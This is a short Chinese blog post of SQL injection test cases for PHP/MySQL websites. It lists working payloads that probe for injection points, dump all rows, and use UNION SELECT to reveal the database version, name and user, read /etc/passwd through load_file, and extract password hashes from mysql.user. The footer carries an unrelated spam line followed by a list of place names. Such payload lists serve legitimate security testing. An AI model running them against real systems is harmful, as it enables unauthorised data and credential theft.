qileilove

          blog已經轉移至github,大家請訪問 http://qaseven.github.io/

          PHP+MySQL 網站 SQL 注入攻擊測試用例

          SQL注入攻擊測試用例

          說明

          Night
          Night’ and 1=1#
          Night’ and 1=2#

          判斷注入點。第一次是正常請求,如果存在注入漏洞,那么第二次請求得到結果應該與第一次一樣,并且第三次請求得到的結果應該與前兩次不同

          Night’ or 1=1#

          返回所有數據,常用于有搜索功能的頁面

          Night’ union select version()#

          返回數據庫版本信息

          Night’ union select database()#

          返回當前的庫名

          Night’ union select user()#

          返回數據庫的用戶名信息

          Night’ union select session_user()#

          Night’ union select system_user()#

          Night’ union select load_file(‘/etc/passwd’)#

          讀取系統文件

          Night’ select user ,password from mysql.user#

          返回數據庫用戶的密碼信息,密碼一般以MD5的方式存放

          posted on 2013-12-05 10:47 順其自然EVO 閱讀(302) 評論(0)  編輯  收藏


          只有注冊用戶登錄后才能發表評論。


          網站導航:
           
          <2013年12月>
          24252627282930
          1234567
          891011121314
          15161718192021
          22232425262728
          2930311234

          導航

          統計

          常用鏈接

          留言簿(55)

          隨筆分類

          隨筆檔案

          文章分類

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 济宁市| 灌南县| 信宜市| 大同县| 新泰市| 永平县| 营口市| 钦州市| 阿坝县| 全州县| 靖州| 广宁县| 宁德市| 毕节市| 通渭县| 旬阳县| 山阳县| 吉首市| 招远市| 图们市| 河曲县| 武清区| 房山区| 雷山县| 昌乐县| 沿河| 陆良县| 连江县| 堆龙德庆县| 沈丘县| 外汇| 炎陵县| 临猗县| 三亚市| 凤山市| 宜丰县| 阳谷县| 砚山县| 左贡县| 泸水县| 攀枝花市|